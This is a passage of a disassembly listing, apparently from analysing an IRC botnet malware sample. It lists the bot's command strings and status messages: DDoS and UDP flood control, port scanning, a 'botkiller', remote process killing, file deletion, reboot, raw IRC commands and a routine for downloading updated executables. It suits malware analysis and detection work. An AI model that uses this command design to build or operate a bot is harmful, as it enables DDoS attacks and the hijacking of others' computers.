; char aChr_0[]
aChr_0 db '$chr(',0 ; DATA XREF: sub_40ABFE+1220�o
align 4
; char asc_4222CC[]
asc_4222CC: ; DATA XREF: sub_40ABFE+1250�o
unicode 0, <)>,0
; char a63[]
a63 db '63',0 ; DATA XREF: sub_40ABFE+127D�o
align 4
; char asc_4222D4[]
asc_4222D4: ; DATA XREF: sub_40ABFE+1367�o
unicode 0, < >,0
; char asc_4222D8[]
asc_4222D8: ; DATA XREF: sub_40ABFE+13A2�o
unicode 0, < >,0
; char aIrc_rndnick[]
aIrc_rndnick db 'irc.rndnick',0 ; DATA XREF: sub_40ABFE+1401�o
; char aRn[]
aRn db 'rn',0 ; DATA XREF: sub_40ABFE+141E�o
align 4
; char aNickS_0[]
aNickS_0 db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE+1451�o
align 4
; char dword_4222F8[]
dword_4222F8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+1465�o
dd 2BBBB02h
aRandomNickChan db ' Random nick change: %s',0
align 4
; char aIrc_die[]
aIrc_die db 'irc.die',0 ; DATA XREF: sub_40ABFE+1486�o
; char aIrc_di[]
aIrc_di db 'irc.di',0 ; DATA XREF: sub_40ABFE+14A3�o
align 4
; char a332_0[]
a332_0 db '332',0 ; DATA XREF: sub_40ABFE+14B9�o
; char aIrc_logout[]
aIrc_logout db 'irc.logout',0 ; DATA XREF: sub_40ABFE+14E8�o
align 4
; char aLo[]
aLo db 'lo',0 ; DATA XREF: sub_40ABFE+1505�o
align 10h
; char dword_422350
dword_422350 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+157D�o
dd 2BBBB02h
aUserSLoggedO_1 db ' User %s logged out.',0
align 10h
; char dword_422380
dword_422380 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+15A9�o
dd 2BBBB02h
aNoUserLoggedIn db ' No user logged in at slot: %d.',0
align 4
; char dword_4223BC
dword_4223BC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+15C5�o
dd 2BBBB02h
aInvalidLoginSl db ' Invalid login slot number: %d.',0
align 4
; char dword_4223F8
dword_4223F8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+1631�o
dd 2BBBB02h
aUserSLoggedO_2 db ' User %s logged out.',0
align 4
; char aIrc_version[]
aIrc_version db 'irc.version',0 ; DATA XREF: sub_40ABFE+1691�o
; char aVer[]
aVer db 'ver',0 ; DATA XREF: sub_40ABFE+16AE�o
; char dword_422438
dword_422438 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+16C3�o
dd 2BBBB02h, 73252020h, 0
; char aLog_off[]
aLog_off db 'log.off',0 ; DATA XREF: sub_40ABFE+171F�o
aLogList db 'Log list',0 ; DATA XREF: sub_40ABFE+173E�o
align 4
dword_42246C dd 6F026C02h, 2E1F671Fh, 2Eh; char aDdos_off[]
aDdos_off db 'ddos.off',0 ; DATA XREF: sub_40ABFE+1777�o
align 4
aDdosFlood db 'DDoS flood',0 ; DATA XREF: sub_40ABFE+1796�o
align 10h
dword_422490 dd 64026402h, 1F731F6Fh, 2E2Eh; char aDdos_udp_off[]
aDdos_udp_off db 'ddos.udp.off',0 ; DATA XREF: sub_40ABFE+17CF�o
align 4
aUdpFlood db 'UDP flood',0 ; DATA XREF: sub_40ABFE+17EE�o
align 4
dword_4224B8 dd 64027502h, 2E1F701Fh, 2Eh; char aDaemon_tftp_of[]
aDaemon_tftp_of db 'daemon.tftp.off',0 ; DATA XREF: sub_40ABFE+1827�o
aServer_0 db 'Server',0 ; DATA XREF: sub_40ABFE+1846�o
align 4
dword_4224DC dd 66027402h, 641F7074h, 2E2E1Fh; char aCom_procs_off[]
aCom_procs_off db 'com.procs.off',0 ; DATA XREF: sub_40ABFE+187F�o
align 4
; char aCom_ps_off[]
aCom_ps_off db 'com.ps.off',0 ; DATA XREF: sub_40ABFE+189C�o
align 4
aProcessList db 'Process list',0 ; DATA XREF: sub_40ABFE+18BB�o
align 4
dword_422514 dd 72027002h, 1F631F6Fh, 2E2Eh; char aBotkiller_off[]
aBotkiller_off db 'botkiller.off',0 ; DATA XREF: sub_40ABFE+18F4�o
align 10h
; char aBk_off[]
aBk_off db 'bk.off',0 ; DATA XREF: sub_40ABFE+1911�o
align 4
aBotkiller db 'Botkiller',0 ; DATA XREF: sub_40ABFE+1930�o
align 4
aBotkiller_0 db 'BOTKILLER',0 ; DATA XREF: sub_40ABFE+1935�o
align 10h
; char aLockdown_stop[]
aLockdown_stop db 'lockdown.stop',0 ; DATA XREF: sub_40ABFE+1969�o
align 10h
aSecure db 'Secure',0 ; DATA XREF: sub_40ABFE+1988�o
align 4
dword_422568 dd 65027302h, 1F727563h, 2E2E1F65h, 0; char aScanstop[]
aScanstop db 'scanstop',0 ; DATA XREF: sub_40ABFE+19C1�o
align 4
aScan db 'Scan',0 ; DATA XREF: sub_40ABFE+19E0�o
align 4
aScan_0 db '[SCAN]',0 ; DATA XREF: sub_40ABFE+19E5�o
align 4
; char aStats[]
aStats db 'stats',0 ; DATA XREF: sub_40ABFE+1A19�o
align 4
; char aSt[]
aSt db 'st',0 ; DATA XREF: sub_40ABFE+1A36�o
align 10h
; char aIrc_reconnect[]
aIrc_reconnect db 'irc.reconnect',0 ; DATA XREF: sub_40ABFE+1A72�o
align 10h
; char aIrc_r[]
aIrc_r db 'irc.r',0 ; DATA XREF: sub_40ABFE+1A8F�o
align 4
; char aQuitReconnecti[]
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE:loc_40C69D�o
align 10h
dword_4225D0 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+1AAE�o
dd 2BBBB02h, 65522020h, 6E6E6F63h, 69746365h, 2E676Eh
; char aIrc_disconnect[]
aIrc_disconnect db 'irc.disconnect',0 ; DATA XREF: sub_40ABFE+1ACD�o
align 4
; char aIrc_d[]
aIrc_d db 'irc.d',0 ; DATA XREF: sub_40ABFE+1AEA�o
align 10h
; char aQuitDisconnect[]
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE:loc_40C6F8�o
align 4
dword_422628 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+1B09�o
dd 2BBBB02h, 69442020h, 6E6F6373h, 7463656Eh, 2E676E69h
dd 0
; char aIrc_quit[]
aIrc_quit db 'irc.quit',0 ; DATA XREF: sub_40ABFE+1B29�o
align 10h
; char aIrc_q[]
aIrc_q db 'irc.q',0 ; DATA XREF: sub_40ABFE+1B46�o
align 4
; char aQuitS[]
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE+1B9E�o
align 4
; char aQuitLater[]
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE:loc_40C7AE�o
align 4
; char aIrc_status[]
aIrc_status db 'irc.status',0 ; DATA XREF: sub_40ABFE+1BD4�o
align 10h
; char aIrc_s[]
aIrc_s db 'irc.s',0 ; DATA XREF: sub_40ABFE+1BF1�o
align 4
; char dword_422698
dword_422698 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+1C0E�o
dd 2BBBB02h
aStatusReady_Bo db ' Status: Ready. Bot Uptime: %s.',0
align 4
; char aIrc_id[]
aIrc_id db 'irc.id',0 ; DATA XREF: sub_40ABFE+1C64�o
align 4
; char aIrc_i[]
aIrc_i db 'irc.i',0 ; DATA XREF: sub_40ABFE+1C81�o
align 4
; char dword_4226E4
dword_4226E4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+1C96�o
dd 2BBBB02h, 6F422020h, 44492074h, 7325203Ah, 2Eh
; char aCom_rebewt[]
aCom_rebewt db 'com.rebewt',0 ; DATA XREF: sub_40ABFE+1CEC�o
align 4
dword_422718 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+1D05�o
dd 2BBBB02h
aRebootingSyste db ' Rebooting system.',0
dword_422744 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE:loc_40C90F�o
dd 2BBBB02h
aFailedToReboot db ' Failed to reboot system.',0
align 4
; char aThreads_list[]
aThreads_list db 'threads.list',0 ; DATA XREF: sub_40ABFE+1D71�o
align 4
; char aThreads_l[]
aThreads_l db 'threads.l',0 ; DATA XREF: sub_40ABFE+1D8E�o
align 4
; char aSub[]
aSub db 'sub',0 ; DATA XREF: sub_40ABFE+1DEA�o
; char dword_422798
dword_422798 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40ABFE+1E23�o
dd 2029671Fh, 2BBBB02h, 694C2020h, 74207473h, 61657268h
dd 2E7364h
; char dword_4227C4
dword_4227C4 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40ABFE+1EB1�o
dd 2029671Fh, 2BBBB02h
aFailedToStartL db ' Failed to start list thread, error: <%d>.',0
; char aIrc_aliases[]
aIrc_aliases db 'irc.aliases',0 ; DATA XREF: sub_40ABFE+1EE7�o
; char aIrc_al[]
aIrc_al db 'irc.al',0 ; DATA XREF: sub_40ABFE+1F04�o
align 10h
dword_422820 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+1F2B�o
dd 2BBBB02h, 6C412020h, 20736169h, 7473696Ch, 2Eh
; char aIrc_log[]
aIrc_log db 'irc.log',0 ; DATA XREF: sub_40ABFE+1F4B�o
; char aIrc_lg[]
aIrc_lg db 'irc.lg',0 ; DATA XREF: sub_40ABFE+1F68�o
align 4
; char aS_1[]
aS_1 db '%s',0 ; DATA XREF: sub_40ABFE+1FCB�o
align 4
; char dword_42285C
dword_42285C dd 7A026E02h, 201F6D1Fh, 676F6C28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+201C�o
dd 2BBBB02h, 694C2020h, 6E697473h, 6F6C2067h, 2E67h
; char dword_422884[]
dword_422884 dd 7A026E02h, 201F6D1Fh, 676F6C28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+20AA�o
dd 2BBBB02h
aFailedToStar_0 db ' Failed to start listing thread, error: <%d>.',0
align 4
; char aUtil_clearlog[]
aUtil_clearlog db 'util.clearlog',0 ; DATA XREF: sub_40ABFE+20CB�o
align 4
; char aUtil_clg[]
aUtil_clg db 'util.clg',0 ; DATA XREF: sub_40ABFE+20E8�o
align 4
; char aCom_netinfo[]
aCom_netinfo db 'com.netinfo',0 ; DATA XREF: sub_40ABFE+2127�o
; char aCom_ni[]
aCom_ni db 'com.ni',0 ; DATA XREF: sub_40ABFE+2144�o
align 4
dword_4228FC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+2183�o
dd 2BBBB02h, 654E2020h, 726F7774h, 6E49206Bh, 2E6F66h
; char aCom_sysinfo[]
aCom_sysinfo db 'com.sysinfo',0 ; DATA XREF: sub_40ABFE+21A3�o
; char aCom_si[]
aCom_si db 'com.si',0 ; DATA XREF: sub_40ABFE+21C0�o
align 4
dword_422938 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+21FB�o
dd 2BBBB02h, 79532020h, 6D657473h, 666E4920h, 2E6Fh
dword_422960 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+2239�o
dd 2BBBB02h, 65522020h, 69766F6Dh, 4220676Eh, 2E746Fh
; char aCom_procs[]
aCom_procs db 'com.procs',0 ; DATA XREF: sub_40ABFE+2278�o
align 4
; char aCom_ps[]
aCom_ps db 'com.ps',0 ; DATA XREF: sub_40ABFE+2295�o
align 4
a_n_z_m_Process db '.n.z.m. (processes.p.l.g) .. Already running.',0
; DATA XREF: sub_40ABFE+22C3�o
align 10h
; char aFull[]
aFull db 'full',0 ; DATA XREF: sub_40ABFE+233A�o
align 4
; char a_n_z_m_Proce_0[]
a_n_z_m_Proce_0 db '.n.z.m. (processes.p.l.g) .. Proccess list.',0
; DATA XREF: sub_40ABFE:loc_40CF52�o
align 4
; char a_n_z_m_Proce_1[]
a_n_z_m_Proce_1 db '.n.z.m. (processes.p.l.g) .. Failed to start listing thread, e'
; DATA XREF: sub_40ABFE+23E2�o
db 'rror: <%d>.',0
align 4
; char aBk_on[]
aBk_on db 'bk.on',0 ; DATA XREF: sub_40ABFE+2418�o
align 10h
; char aBotkiller_on[]
aBotkiller_on db 'botkiller.on',0 ; DATA XREF: sub_40ABFE+2435�o
align 10h
; char aBk_on_a[]
aBk_on_a db 'bk.on.a',0 ; DATA XREF: sub_40ABFE+2452�o
; char aBotkiller_on_a[]
aBotkiller_on_a db 'botkiller.on.a',0 ; DATA XREF: sub_40ABFE+246F�o
align 4
a_n_z_m_Botki_0 db '.n.z.m. (botkiller.p.l.g) .. Already running.',0
; DATA XREF: sub_40ABFE+249D�o
align 4
; char aBk_on_a_0[]
aBk_on_a_0 db 'bk.on.a',0 ; DATA XREF: sub_40ABFE+24C5�o
; char aBotkiller_on_0[]
aBotkiller_on_0 db 'botkiller.on.a',0 ; DATA XREF: sub_40ABFE+24E2�o
align 4
; char a_n_z_m_Botki_1[]
a_n_z_m_Botki_1 db '.n.z.m. (botkiller.p.l.g) .. Botkiller.',0
; DATA XREF: sub_40ABFE+2521�o
align 10h
; char a_n_z_m_Botki_2[]
a_n_z_m_Botki_2 db '.n.z.m. (botkiller.p.l.g) .. Failed to start botkiller thread,'
; DATA XREF: sub_40ABFE+25AF�o
db ' error: <%d>.',0
align 10h
; char aCom_uptime[]
aCom_uptime db 'com.uptime',0 ; DATA XREF: sub_40ABFE+260B�o
align 4
; char aCom_up[]
aCom_up db 'com.up',0 ; DATA XREF: sub_40ABFE+2628�o
align 4
; char dword_422B64
dword_422B64 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+26AA�o
dd 2BBBB02h, 70552020h, 656D6974h, 7325203Ah, 2Eh
; char aIrc_who[]
aIrc_who db 'irc.who',0 ; DATA XREF: sub_40ABFE+2700�o
aLoginList db '-[Login List]-',0 ; DATA XREF: sub_40ABFE+2722�o
align 4
aEmpty db '<Empty>',0 ; DATA XREF: sub_40ABFE:loc_40D381�o
; char aD_S[]
aD_S db '%d. %s',0 ; DATA XREF: sub_40ABFE+2799�o
align 4
dword_422BB4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE:loc_40D3D0�o
dd 2BBBB02h
aLoginListCompl db ' Login list complete.',0
align 4
; char aCurrentip[]
aCurrentip db 'currentip',0 ; DATA XREF: sub_40ABFE+27EF�o
align 10h
; char aCip[]
aCip db 'cip',0 ; DATA XREF: sub_40ABFE+280C�o
; char aMass[]
aMass db 'mass',0 ; DATA XREF: sub_40ABFE+2890�o
align 4
; char a_n_z_m_Root_p_[]
a_n_z_m_Root_p_ db '.n.z.m. (root.p.l.g) .. Already %d scanning threads. Too many '
; DATA XREF: sub_40ABFE+292E�o
db 'specified.',0
; char a_n_z_m_Root__0[]
a_n_z_m_Root__0 db '.n.z.m. (root.p.l.g) .. Failed to start scan, port is invalid.'
; DATA XREF: sub_40ABFE+2A92�o
db 0
align 4
aRandom db 'Random',0 ; DATA XREF: sub_40ABFE+2C3E�o
align 4
aSequential db 'Sequential',0 ; DATA XREF: sub_40ABFE:loc_40D848�o
align 10h
; char a_n_z_m_Root__1[]
a_n_z_m_Root__1 db '.n.z.m. (root.p.l.g) .. %s Port Scan started on %s:%d with a d'
; DATA XREF: sub_40ABFE+2C79�o
db 'elay of %d seconds for %d minutes using %d threads.',0
align 4
; char a_n_z_m_Root__2[]
a_n_z_m_Root__2 db '.n.z.m. (root.p.l.g) .. Failed to start scan thread, error: <%'
; DATA XREF: sub_40ABFE+2D08�o
db 'd>.',0
align 10h
; char aIrc_nick[]
aIrc_nick db 'irc.nick',0 ; DATA XREF: sub_40ABFE+2D81�o
align 4
; char aIrc_n[]
aIrc_n db 'irc.n',0 ; DATA XREF: sub_40ABFE+2D9E�o
align 4
; char aNickS_1[]
aNickS_1 db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE+2DBB�o
align 10h
; char dword_422D80[]
dword_422D80 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+2DD8�o
dd 2BBBB02h
aNickChangedToS db ' Nick changed to: ',27h,'%s',27h,'.',0
align 4
; char aIrc_join[]
aIrc_join db 'irc.join',0 ; DATA XREF: sub_40ABFE+2DF9�o
align 10h
; char aIrc_j[]
aIrc_j db 'irc.j',0 ; DATA XREF: sub_40ABFE+2E16�o
align 4
; char aJoinSS_2[]
aJoinSS_2 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE+2E40�o
align 4
; char dword_422DD8[]
dword_422DD8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+2E5D�o
dd 2BBBB02h
aJoinedChanne_0 db ' Joined channel: ',27h,'%s',27h,'.',0
; char aIrc_part[]
aIrc_part db 'irc.part',0 ; DATA XREF: sub_40ABFE+2E7E�o
align 4
; char aIrc_pt[]
aIrc_pt db 'irc.pt',0 ; DATA XREF: sub_40ABFE+2E9B�o
align 4
; char aPartS[]
aPartS db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE+2EB8�o
align 4
; char dword_422E28[]
dword_422E28 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+2ED5�o
dd 2BBBB02h
aPartedChannelS db ' Parted channel: ',27h,'%s',27h,'.',0
; char aIrc_raw[]
aIrc_raw db 'irc.raw',0 ; DATA XREF: sub_40ABFE+2EF6�o
; char aIrc_ra[]
aIrc_ra db 'irc.ra',0 ; DATA XREF: sub_40ABFE+2F13�o
align 4
; char aS_2[]
aS_2 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE+2F5B�o
align 10h
; char dword_422E70[]
dword_422E70 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+2F71�o
dd 2BBBB02h, 52492020h, 61522043h, 25203A77h, 2E73h
; char aThreads_kill[]
aThreads_kill db 'threads.kill',0 ; DATA XREF: sub_40ABFE+2F92�o
align 4
; char aThreads_k[]
aThreads_k db 'threads.k',0 ; DATA XREF: sub_40ABFE+2FAF�o
align 4
; char aAll[]
aAll db 'all',0 ; DATA XREF: sub_40ABFE+2FD0�o
; char dword_422EB8
dword_422EB8 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40ABFE+2FFA�o
dd 2029671Fh, 2BBBB02h
aStoppedDThread db ' Stopped: %d thread(s).',0
align 10h
; char dword_422EF0
dword_422EF0 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40ABFE:loc_40DC0E�o
dd 2029671Fh, 2BBBB02h
aNoActiveThread db ' No active threads found.',0
align 4
; char dword_422F28
dword_422F28 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40ABFE+30C4�o
dd 2029671Fh, 2BBBB02h
aKilledThreadS_ db ' Killed thread: %s.',0
align 4
; char dword_422F5C
dword_422F5C dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40ABFE+30E7�o
dd 2029671Fh, 2BBBB02h
aFailedToKillTh db ' Failed to kill thread: %s.',0
align 4
; char aIrc_setserve[]
aIrc_setserve db 'irc.setserve',0 ; DATA XREF: sub_40ABFE+3148�o
align 4
; char aIrc_se[]
aIrc_se db 'irc.se',0 ; DATA XREF: sub_40ABFE+3165�o
align 10h
; char dword_422FB0
dword_422FB0 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+319C�o
dd 2BBBB02h
aServerChangedT db ' Server changed to: ',27h,'%s',27h,'.',0
align 4
; char aCom_killprocna[]
aCom_killprocna db 'com.killprocname',0 ; DATA XREF: sub_40ABFE+31F8�o
align 4
; char aCom_kpn[]
aCom_kpn db 'com.kpn',0 ; DATA XREF: sub_40ABFE+3215�o
; char unk_423000
unk_423000 db 2 ; DATA XREF: sub_40ABFE+325F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aProcessKilledS db 'Process killed: %s',0
align 4
; char unk_423034
unk_423034 db 2 ; DATA XREF: sub_40ABFE+3282�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToTermin db 'Failed to terminate process: %s',0
; char aCom_prockillid[]
aCom_prockillid db 'com.prockillid',0 ; DATA XREF: sub_40ABFE+32DE�o
align 4
; char aCom_pkid[]
aCom_pkid db 'com.pkid',0 ; DATA XREF: sub_40ABFE+32FB�o
align 10h
; char unk_423090
unk_423090 db 2 ; DATA XREF: sub_40ABFE+333B�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aProcessKilledI db 'Process killed ID: %s',0
align 4
; char unk_4230C8
unk_4230C8 db 2 ; DATA XREF: sub_40ABFE+335E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToTerm_0 db 'Failed to terminate process ID: %s',0
align 4
; char aCom_delete[]
aCom_delete db 'com.delete',0 ; DATA XREF: sub_40ABFE+33BA�o
align 4
; char aCom_del[]
aCom_del db 'com.del',0 ; DATA XREF: sub_40ABFE+33D7�o
; char dword_423120
dword_423120 dd 7A026E02h, 201F6D1Fh, 6C696628h, 1F702E65h, 29671F6Ch
; DATA XREF: sub_40ABFE+340F�o
dd 0BBBB0220h, 44202002h, 74656C65h, 27206465h, 2E277325h
dd 0
dword_42314C dd 7A026E02h, 201F6D1Fh, 6C696628h, 1F702E65h, 29671F6Ch
; DATA XREF: sub_40ABFE:loc_40E028�o
dd 0BBBB0220h, 2002h
; char aMirc_cmd[]
aMirc_cmd db 'mirc.cmd',0 ; DATA XREF: sub_40ABFE+3492�o
align 4
; char aMirc_cmd_0[]
aMirc_cmd_0 db 'mirc.cmd',0 ; DATA XREF: sub_40ABFE+34AF�o
align 10h
; char unk_423180
unk_423180 db 2 ; DATA XREF: sub_40ABFE+3509�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Dh, 69h, 72h
db 63h ; c
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aClientNotOpen_ db ' Client not open.',0
; char dword_4231AC
dword_4231AC dd 7A026E02h, 201F6D1Fh, 72696D28h, 1F702E63h, 29671F6Ch
; DATA XREF: sub_40ABFE:loc_40E11C�o
dd 0BBBB0220h, 43202002h, 616D6D6Fh, 7320646Eh, 2E746E65h
dd 0
; char aIrc_gethost[]
aIrc_gethost db 'irc.gethost',0 ; DATA XREF: sub_40ABFE+3579�o
; char aIrc_gh[]
aIrc_gh db 'irc.gh',0 ; DATA XREF: sub_40ABFE+3596�o
align 4
; char aSSSS[]
aSSSS db '%s %s %s :%s',0 ; DATA XREF: sub_40ABFE+361E�o
align 4
; char dword_4231FC
dword_4231FC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+365C�o
dd 2BBBB02h
aGethostSComman db ' Gethost: %s, Command: %s',0
align 10h
; char dword_423230
dword_423230 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE:loc_40E277�o
dd 2BBBB02h
aUnableToExtrac db ' Unable to extract Gethost command.',0
align 10h
; char dword_423270
dword_423270 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+36CA�o
dd 2BBBB02h, 65472020h, 736F6874h, 25203A74h, 2E73h
; char aIrc_privmsg[]
aIrc_privmsg db 'irc.privmsg',0 ; DATA XREF: sub_40ABFE+371D�o
; char aIrc_pm[]
aIrc_pm db 'irc.pm',0 ; DATA XREF: sub_40ABFE+373A�o
align 4
; char dword_4232AC[]
dword_4232AC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+37F1�o
dd 2BBBB02h
aPrivmsgSS_ db ' Privmsg: %s: %s.',0
align 4
; char aIrc_action[]
aIrc_action db 'irc.action',0 ; DATA XREF: sub_40ABFE+3813�o
align 4
; char aIrc_ac[]
aIrc_ac db 'irc.ac',0 ; DATA XREF: sub_40ABFE+3830�o
align 4
; char dword_4232EC
dword_4232EC dd 54434101h, 204E4F49h, 17325h; char dword_4232F8[]
dword_4232F8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+3902�o
dd 2BBBB02h
aActionSS_ db ' Action: %s: %s.',0
align 4
; char aIrc_cycle[]
aIrc_cycle db 'irc.cycle',0 ; DATA XREF: sub_40ABFE+3924�o
align 10h
; char aIrc_cy[]
aIrc_cy db 'irc.cy',0 ; DATA XREF: sub_40ABFE+3941�o
align 4
; char a332_1[]
a332_1 db '332',0 ; DATA XREF: sub_40ABFE+395B�o
; char aPartS_0[]
aPartS_0 db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE+3980�o
align 4
; char aJoinSS_3[]
aJoinSS_3 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE+39CA�o
align 4
dword_423358 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+39DA�o
dd 2BBBB02h, 79432020h, 2E656C63h, 0
; char aIrc_mode[]
aIrc_mode db 'irc.mode',0 ; DATA XREF: sub_40ABFE+39FA�o
align 4
; char aIrc_m[]
aIrc_m db 'irc.m',0 ; DATA XREF: sub_40ABFE+3A17�o
align 10h
; char aModeS[]
aModeS db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE+3A5F�o
align 4
; char dword_42339C[]
dword_42339C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+3A75�o
dd 2BBBB02h
aModeChangeS db ' Mode change: %s',0
align 4
; char aSS_exe[]
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_40ABFE+3B13�o
align 4
; char unk_4233D4
unk_4233D4 db 2 ; DATA XREF: sub_40ABFE+3C09�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 75h, 70h, 64h
db 61h ; a
db 74h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aDownloadingUpd db ' Downloading update from: %s.',0
align 10h
; char unk_423410
unk_423410 db 2 ; DATA XREF: sub_40ABFE+3C99�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 75h, 70h, 64h
db 61h ; a
db 74h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToStartD db ' Failed to start download thread, error: <%d>.',0
align 4
; char unk_42345C
unk_42345C db 2 ; DATA XREF: sub_40ABFE:loc_40E8AD�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 75h, 70h, 64h
db 61h ; a
